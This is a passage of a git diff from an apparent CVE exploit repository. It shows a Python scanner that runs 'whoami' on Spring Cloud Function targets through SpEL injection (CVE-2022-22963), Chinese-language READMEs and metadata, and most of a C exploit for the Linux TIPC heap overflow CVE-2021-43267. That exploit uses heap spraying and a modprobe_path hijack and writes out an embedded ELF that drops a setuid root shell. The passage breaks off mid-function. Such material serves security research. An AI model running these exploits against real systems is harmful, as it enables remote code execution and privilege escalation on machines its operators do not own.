+                poc_file.close()
+            else:
+                print ( f'[-] { url } not vulnerable' )
+
+        except requests.exceptions.RequestException:
+            print ( f'[-] { url } detection timed out' )
+            continue
+        except:
+            print ( f'[-] { url } error' )
+            continue
+
+
+
+if __name__ == '__main__' :
+    try:
+        cmd1 =sys.argv[1]
+        t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) 
+        t.start()
+    except:
+        print ( 'Usage:' )
+        print('python poc.py url.txt')
         pass
\ No newline at end of file
diff --git a/cve/java-spring/2022/CVE-2022-22963/README.md b/cve/java-spring/2022/CVE-2022-22963/README.md
index 0ab23368..0440d772 100644
--- a/cve/java-spring/2022/CVE-2022-22963/README.md
+++ b/cve/java-spring/2022/CVE-2022-22963/README.md
@@ -1,10 +1,10 @@
-# CVE-2022-22963
-CVE-2022-22963 PoC 
-
-Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable.
-
-# REF
-https://github.com/dinosn/CVE-2022-22963
-https://avd.aliyun.com/search?q=CVE-2022-22963
-https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, 
+# CVE-2022-22963
+CVE-2022-22963 PoC 
+
+Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable.
+
+# REF
+https://github.com/dinosn/CVE-2022-22963
+https://avd.aliyun.com/search?q=CVE-2022-22963
+https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, 
 https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
\ No newline at end of file
diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
index 496e1ad2..bd94e2e1 100644
--- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
+++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-22963
-source: https://github.com/dinosn/CVE-2022-22963
-info:
-  name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
-  severity: critical
-  description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严，未授权的攻击者可构造特定的数据包，通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击，从而可执行任意的恶意 Java 代码，获取服务权限。
-  scope-of-influence: Spring Cloud Function<3.1.7
-  reference:
-    - https://github.com/dinosn/CVE-2022-22963 
-    - https://avd.aliyun.com/search?q=CVE-2022-22963 
-    - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html
-    - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-22963
-    cwe-id: CWE-94
-    cnvd-id: None
-    kve-id: None
-  tags: cve2022, spring-framework, 表达式注入
+id: CVE-2022-22963
+source: https://github.com/dinosn/CVE-2022-22963
+info:
+  name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
+  severity: critical
+  description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严，未授权的攻击者可构造特定的数据包，通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击，从而可执行任意的恶意 Java 代码，获取服务权限。
+  scope-of-influence: Spring Cloud Function<3.1.7
+  reference:
+    - https://github.com/dinosn/CVE-2022-22963 
+    - https://avd.aliyun.com/search?q=CVE-2022-22963 
+    - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html
+    - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22963
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, spring-framework, 表达式注入
diff --git a/cve/linux-kernel/2021/CVE-2021-42008/README.md b/cve/linux-kernel/2021/CVE-2021-42008/README.md
index 9d3bcccf..31dc9683 100644
--- a/cve/linux-kernel/2021/CVE-2021-42008/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-42008/README.md
@@ -1,30 +1,30 @@
-# CVE-2021-42008
-
-## 漏洞描述
-drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞，用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ，对输入进行解码并保存到 sixpack->cooked_buf ，sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标，确定写入解码字节的目标偏移。问题是如果多次调用decode_data()，rx_count_cooked就会一直递增，直到超过 cooked_buf 的长度（400字节），导致越界写。
-
-## 测试环境配置
-Linux-v5.13.12 测试环境见`env/`
-
-原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64，如果适配其他版本，需修改 sp->cooked_buf 和下一个对象的距离。
-
-编译选项：CONFIG_6PACK=y CONFIG_AX25=y
-
-在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。
-
-本文exp用到了userfaultfd，但5.11版本开始限制了用户对userfaultfd的使用，所以需根据 first patch 和 second patch 补丁进行回退（去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可）。
-
-```bash
-$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz
-$ tar -xvf linux-5.13.12.tar.xz
-# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
-$ make -j32
-$ make all
-$ make modules
-# 编译出的bzImage目录：/arch/x86/boot/bzImage。
-```
-
-## 保护机制
-KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY
-
+# CVE-2021-42008
+
+## 漏洞描述
+drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞，用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ，对输入进行解码并保存到 sixpack->cooked_buf ，sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标，确定写入解码字节的目标偏移。问题是如果多次调用decode_data()，rx_count_cooked就会一直递增，直到超过 cooked_buf 的长度（400字节），导致越界写。
+
+## 测试环境配置
+Linux-v5.13.12 测试环境见`env/`
+
+原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64，如果适配其他版本，需修改 sp->cooked_buf 和下一个对象的距离。
+
+编译选项：CONFIG_6PACK=y CONFIG_AX25=y
+
+在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。
+
+本文exp用到了userfaultfd，但5.11版本开始限制了用户对userfaultfd的使用，所以需根据 first patch 和 second patch 补丁进行回退（去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可）。
+
+```bash
+$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz
+$ tar -xvf linux-5.13.12.tar.xz
+# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
+$ make -j32
+$ make all
+$ make modules
+# 编译出的bzImage目录：/arch/x86/boot/bzImage。
+```
+
+## 保护机制
+KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY
+
 引用自[bsauce](https://www.jianshu.com/p/d4d2874ed356)
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c
index c8793f63..15558149 100644
--- a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c
+++ b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c
@@ -1,749 +1,749 @@
-/* 
- * Local PoC exploit for CVE-2021-43267 [1]
- *
- * I want to see someone make a remote exploit for this.
- *
- * Only really tested on my local copy of 5.15. But given that you need the
- * TIPC module loaded it is unlikely scriptkiddies will have a use for this.
- *
- * Exploit is a bit CTF quality. Feel free to send me revised copies. 
- *
- * Enjoy!
- *
- * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-
- *     allows-arbitrary-code-execution/
- */
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <stdbool.h>
-#include <stdarg.h>
-#include <arpa/inet.h>
-#include <sys/socket.h>
-#include <sys/ipc.h>
-#include <sys/ioctl.h>
-#include <sys/msg.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <time.h>
-#include <unistd.h>
-#include <linux/netlink.h>
-
-// these are offsets for my kernel, not yours
-#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str
-#define PTS_UNIX98_OPS 0x127f960 // /   `Couldn't allocate Unix98 ptm driver`
-#define MODPROBE_PATH  0x16500E0 // has symbol
-#define GADGET_WRITE32 0x2c51f5  // 31 c0 48 89 32 c3
-#define GADGET_RET     0x2c51fa  // c3
-
-// good numbers
-#define KEY_SIZE       956
-#define MSG_COUNT      2048
-#define BODY_SIZE      976
-#define SMASH_SIZE     32
-#define TRIES_MAX      8
-#define NEXT_OFFSET    0x8000
-
-// some constants
-#define NODE_ID        0x11223344
-#define MTYPE          0xAB /* Ac1db34v3rz */
-#define SPRAY_TTY_CNT  0x40
-#define TTY_MAGIC      0x5401
-#define TIPC_UDP_PORT  6118
-#define MSG_COPY       040000
-
-// TIPC crap
-#define TIPC_VERSION   2
-
-// user messages
-#define LINK_PROTOCOL  7
-#define LINK_CONFIG    13
-
-// message types
-#define STATE_MSG      0
-#define RESET_MSG      1
-#define ACTIVATE_MSG   2
-#define MSG_CRYPTO     14
-
-// media types
-#define MEDIA_TYPE_UDP 3
-
-// w0
-#define hdr_msg_size(v) ((v) & 0x1ffff)
-#define hdr_size(v) ((v & 0xf) << 21)
-#define hdr_user(v) ((v & 0xf) << 25)
-#define hdr_nonseq(v) ((v & 1) << 20)
-#define hdr_version(v) ((v & 7) << 29)
-
-// w1
-#define hdr_msg_type(v) ((v & 7) << 29)
-
-// w2
-#define hdr_link_level_seq(v) (v & 0xffff)
-
-// w4
-#define hdr_next_send_pkt(v) (v & 0xffff)
-
-// w5
-#define hdr_media_id(v) (v & 0xff)
-#define hdr_session_number(v) ((v & 0xffff) << 16)
-
-// prototypes
-struct message_t {
-    long type;
-    uint8_t body[BODY_SIZE];
-};
-
-// globals
-int g_sockfd = 0;
-struct sockaddr_in g_sockaddr;
-
-// utility
-#define info(fmt, args...) report('$', false, fmt, ## args)
-#define infov(fmt, args...) report('~', false, fmt, ## args)
-#define maybe(fmt, args...) report('?', false, fmt, ## args)
-#define fatal(fmt, args...) report('!', true, fmt, ## args)
-#define info_value64(name, value) infov("%-24s: %016lx", name, value)
-
-void report(char indicator, bool error, const char *fmt, ...) {
-    FILE *stream = (error) ? stderr : stdout;
-    va_list a;
-    va_start(a, fmt);
-    fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : "");
-    vfprintf(stream, fmt, a);
-    fprintf(stream, "\n");
-    va_end(a);
-
-    if (error) {
-        exit(-1); // all errors are fatal
-    }
-}
-
-void usage(char *prog) {
-    printf("usage: %s <interface IP>\n\n", prog);
-}
-
-static inline void write64(uint8_t *p, uint64_t v) {
-    *(uint64_t*)(p) = v;
-}
-
-static inline uint64_t read64(uint8_t *p) {
-    return *(uint64_t*)(p);
-}
-
-#define be32 htonl
-
-// netlink
-int netlink_send(
-    uint16_t type, uint16_t flags, uint32_t seq, 
-    uint8_t* pkt, size_t pkt_len,
-    uint8_t **reply_buf, size_t *reply_sz
-) {
-    int sock_fd;
-    struct sockaddr_nl sa;
-    memset(&sa, 0, sizeof(struct sockaddr_nl));
-    sa.nl_family = AF_NETLINK;
-
-    size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len;
-    uint8_t *pkt_full = malloc(pkt_full_len);
-    memset(pkt_full, 0, pkt_full_len); 
-    memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len);
-
-    struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full);
-    netlink_hdr->nlmsg_len = pkt_full_len;
-    netlink_hdr->nlmsg_type = type;
-    netlink_hdr->nlmsg_flags = flags;
-    netlink_hdr->nlmsg_seq = seq;
-    netlink_hdr->nlmsg_pid = getpid();
-
-    if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) {
-        perror("socket");
-        return -1;
-    }
-
-    if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
-        perror("bind");
-        return -1;
-    }
-
-    ssize_t r = sendto(
-        sock_fd, pkt_full, pkt_full_len, 0, 
-        (struct sockaddr*)&sa, sizeof(struct sockaddr_nl)
-    );
-
-    if (r < 0) {
-        perror("sendto");
-        return -1;
-    }
-
-    free(pkt_full);
-
-    if (reply_buf != NULL) {
-        struct msghdr m;
-        memset(&m, 0, sizeof(struct msghdr));
-        m.msg_iovlen = 1;
-        m.msg_iov = malloc(sizeof(struct iovec));
-        m.msg_iov->iov_base = malloc(0x1000);
-        m.msg_iov->iov_len = 0x1000;
-
-        size_t nread;
-
-        if ((nread = recvmsg(sock_fd, &m, 0)) < 0) {
-            goto error;
-        }
-
-        if (m.msg_iovlen != 1) {
-            goto error;
-        }
-
-        *reply_sz = nread;
-        *reply_buf = malloc(*reply_sz);
-        memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz);
-        free(m.msg_iov->iov_base);
-    }
-
-    close(sock_fd);
-    return 0;
-
-error:
-    close(sock_fd);
-    return -1;
-}
-
-int netlink_enable_tipc_udp(char *str_ip_address) {
-    uint8_t pkt_ctrl[]={
-        0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 
-        0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, 
-        0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00
-    };
-
-    uint8_t *nl_reply;
-    size_t nl_reply_len = 0;
-    uint32_t ip_addr;
-    uint32_t seq;
-    int r;
-
-    seq = time(NULL);
-
-    ip_addr = inet_addr(str_ip_address);
-    if (ip_addr == INADDR_NONE) {
-        fatal("invalid ip address given");
-    }
-
-    r = netlink_send(
-        NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq,
-        pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len
-    );
-
-    if(r < 0) {
-        fatal("failed to send netlink control message.");
-    }
-
-    if (nl_reply_len == 0) {
-        fatal("did not get netlink control message reply.");
-    }
-
-    if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) {
-        fatal("tipc support not available.");
-    }
-
-    uint16_t nlmsg_type = 0;
-    off_t pos = 0x14;
-
-    while(pos < nl_reply_len - 4) {
-        struct nlattr *attr = (struct nlattr*)(nl_reply + pos);
-        if (attr->nla_type == 1) {
-            nlmsg_type = *(uint16_t*)(nl_reply + pos + 4);
-            break;
-        }
-        pos += attr->nla_len;
-        if ((attr->nla_len % 4) != 0) {
-            pos += 4 - (attr->nla_len % 4);
-        }
-    }
-
-    if (nlmsg_type == 0) {
-        fatal("could not find tipc netlink message type.");
-    }
-
-    uint8_t pkt_tipc_enable_udp[]={
-        0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80,
-        0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a,
-        0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00,
-        0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00,
-        0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6,
-        0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00
-    };
-
-    *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr;
-
-    r = netlink_send(
-        nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, 
-        pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL
-    );
-
-    if (r < 0) {
-        fatal("failed to send netlink tipc udp enable message.");
-    }
-
-    // the right way is to read back a netlink reply and check if this worked..
-    // I chose to go with the scientifically proven method of big chillin'
-    sleep(2);
-
-    return 0;
-}
-
-// tipc packet routines
-void gen_tipc_hdr(
-    uint8_t *o,
-    uint32_t w0, uint32_t w1, uint32_t w2, 
-    uint32_t w3, uint32_t w4, uint32_t w5
-) {
-    uint32_t* o32 = (uint32_t*)o;
-    o32[0] = be32(w0);
-    o32[1] = be32(w1);
-    o32[2] = be32(w2);
-    o32[3] = be32(w3);
-    o32[4] = be32(w4);
-    o32[5] = be32(w5);
-}
-
-ssize_t tipc_send(uint8_t *buf, size_t sz) {
-    return sendto(
-        g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr)
-    );
-}
-
-void tipc_discover() {
-    uint32_t w0, w1, w2, w3, w4, w5;
-    uint8_t pkt[24];
-    w0 = 0;
-    w0 |= hdr_version(TIPC_VERSION);
-    w0 |= hdr_size(6);
-    w0 |= hdr_msg_size(24);
-    w0 |= hdr_user(LINK_CONFIG);
-    w0 |= hdr_nonseq(1);
-    w1 = 0;
-    w2 = 0;
-    w3 = NODE_ID;
-    w4 = 0x1267;
-    w5 = hdr_media_id(MEDIA_TYPE_UDP);
-    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
-    tipc_send(pkt, sizeof(pkt));
-}
-
-void tipc_link_state_a(uint32_t ip) {
-    uint8_t pkt[56];
-    uint32_t *body = (uint32_t*)(pkt + 24);
-    uint32_t w0, w1, w2, w3, w4, w5;
-
-    memset(pkt, 0, sizeof(pkt));
-
-    w0 = hdr_version(TIPC_VERSION);
-    w0 |= hdr_size(10);
-    w0 |= hdr_user(LINK_PROTOCOL);
-    w0 |= hdr_msg_size(56);
-    w1 = hdr_msg_type(RESET_MSG);
-    w2 = hdr_link_level_seq(0x8000);
-    w3 = NODE_ID;
-    w4 = hdr_next_send_pkt(1);
-    w5 = hdr_session_number(50388);
-    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
-
-    int pos = 0;
-    body[pos++] = be32(NODE_ID);
-    body[pos++] = be32(ip);
-    body[pos++] = 0;
-    body[pos++] = be32(3500 << 16);
-    memcpy(body + 4, "UDP1", 4);
-    tipc_send(pkt, sizeof(pkt));
-}
-
-void tipc_link_state_b(uint32_t ip) {
-    uint8_t pkt[44];
-    uint32_t w0, w1, w2, w3, w4, w5;
-    uint32_t *body = (uint32_t*)(pkt + 24);
-
-    memset(pkt, 0, sizeof(pkt));
-
-    w0 = hdr_version(TIPC_VERSION);
-    w0 |= hdr_size(10);
-    w0 |= hdr_user(LINK_PROTOCOL);
-    w0 |= hdr_msg_size(44);
-    w1 = hdr_msg_type(STATE_MSG);
-    w2 = hdr_link_level_seq(1);
-    w3 = NODE_ID;
-    w4 = hdr_next_send_pkt(1);
-    w5 = hdr_session_number(50388);
-
-    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
-
-    int pos = 0;
-    body[pos++] = be32(NODE_ID);
-    body[pos++] = be32(ip);
-    body[pos++] = 0; // timestamp
-    body[pos++] = 0; // max pkt/link tolerance
-    body[pos++] = 0; // bearer instance
-    tipc_send(pkt, sizeof(pkt));
-}
-
-int tipc_link_setup(char *host) {
-    if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
-        perror("socket");
-        return -1;
-    }
-
-    memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr));
-    g_sockaddr.sin_family = AF_INET;
-    g_sockaddr.sin_port = htons(TIPC_UDP_PORT);
-
-    if (inet_aton(host, &g_sockaddr.sin_addr) == 0) {
-        perror("inet_aton");
-        return -1;
-    }
-
-    tipc_discover();
-    tipc_link_state_a(be32(inet_addr(host)));
-    tipc_link_state_b(be32(inet_addr(host)));
-
-    return 0;
-}
-
-void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) {
-    uint8_t pkt[0x1000];
-    uint32_t w0, w1, w2, w3, w4, w5;
-
-    w0 = hdr_version(TIPC_VERSION);
-    w0 |= hdr_size(6);
-    w0 |= hdr_user(MSG_CRYPTO);
-    w0 |= hdr_msg_size(24 + 36 + KEY_SIZE);
-    w1 = 0;
-    w2 = seqno;
-    w3 = NODE_ID;
-    w4 = 0;
-    w5 = 0;
-
-    memset(pkt, 0, sizeof(pkt));
-    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
-
-    memcpy(pkt+24, "HAXX", 4);
-    *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen);
-    memset(pkt+24+36, 'C', KEY_SIZE);
-    memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE);
-    memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen);
-    tipc_send(pkt, sizeof(pkt));
-}
-
-int setup_modprobe_hax() {
-    // small ELF file matroshka doll that does;
-    //   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
-    //   write(fd, elfcode, elfcode_len)
-    //   chmod("/tmp/sh", 04755)
-    //   close(fd);
-    //   exit(0);
-    //
-    // the dropped ELF simply does:
-    //   setuid(0);
-    //   setgid(0);
-    //   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
-    unsigned char elfcode[] = {
-        0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
-        0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
-        0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
-        0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
-        0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
-        0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
-        0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
-        0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
-        0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
-        0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
-        0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
-        0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
-        0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-        0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
-        0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
-        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
-        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
-        0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
-        0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
-        0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
-    };
-
-    FILE *fp;
-
-    fp = fopen("/tmp/benign", "wb");
-    if (fp == NULL) {
-        perror("fopen");
-        return -1;
-    }
-
-    if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) {
-        perror("fwrite");
-        return -1;
-    }
-    fclose(fp);
-
-    fp = fopen("/tmp/hax", "wb");
-    if (fp == NULL) {
-        perror("fopen");
-        return -1;
-    }
-
-    if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {
-        perror("fwrite");
-        return -1;
-    }
-    fclose(fp);
-
-    if (chmod("/tmp/benign", 0777) < 0) {
-        perror("chmod");
-        return -1;
-    }
-
-    if (chmod("/tmp/hax", 0777) < 0) {
-        perror("chmod");
-        return -1;
-    }
-
-    return 0;
-}
-
-int main(int argc, char *argv[]) {
-    uint64_t pty_ops = 0;
-    uint64_t mybuf = 0;
-    uint64_t kernel_base = 0;
-
-    uint8_t fake_tty[0x20];
-    uint8_t peekbuf[0x2000];
-
-    int peek_cnt = 1;
-    int seqno=0;
-
-    int tty_fds[SPRAY_TTY_CNT];
-    int queue_id[MSG_COUNT];
-    int queue_id_final = 0;
-
-    struct message_t dummy;
-    dummy.type = MTYPE;
-    memset(dummy.body, 0x58, BODY_SIZE);
-
-    fprintf(stdout,
-        "\n"
-        "      $$$ Linux 5.10-5.15 CVE-2021-43267 exploit  $$$\n"
-        "              -- by blasty <peter@haxx.in> --\n\n"
-    );
-
-    if (argc != 2) {
-        usage(argv[0]);
-        return -1;
-    }
-
-    info("enabling tipc udp media");
-    if (netlink_enable_tipc_udp(argv[1]) < 0) {
-        fatal("failed to enable tipc udp media");
-    }
-
-    info("establish tipc link");
-    if (tipc_link_setup(argv[1]) < 0) {
-        fatal("failed to establish tipc link");
-    }
-
-    info("installing helpers");
-    if (setup_modprobe_hax() < 0) {
-        fatal("failed to setup helpers");
-    }
-
-    info("create messages queues");
-    if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
-        perror("msgget");
-        fatal("failed to create message queue");
-    }
-
-    for(int i = 0; i < MSG_COUNT; i++) {
-        if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
-            perror("msgget");
-            fatal("failed to create message queue %d", i);
-        }
-    }
-
-    info("spray messages");
-    for(int i = 0; i < MSG_COUNT; i++) {
-        if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) {
-            perror("msgsnd");
-            fatal("failed to create message in queue %d", i);
-        }
-    }
-
-    info("poking holes");
-    for(int i = 0; i < MSG_COUNT; i += 2) {
-        if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) {
-            perror("msgrcv");
-            fatal("failed to peek message in queue %d", i);
-        }
-    }
-
-    info("tipc bug trigger");
-
-    uint64_t hacked_msg[4]={
-        0,      // m_list.prev
-        0,      // m_list.next
-        MTYPE,  // m_type
-        0x2000, // m_ts
-    };
-
-    tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno);
-
-    info("spraying tty_struct\n");
-    for(int i = 0; i < SPRAY_TTY_CNT; i++) {
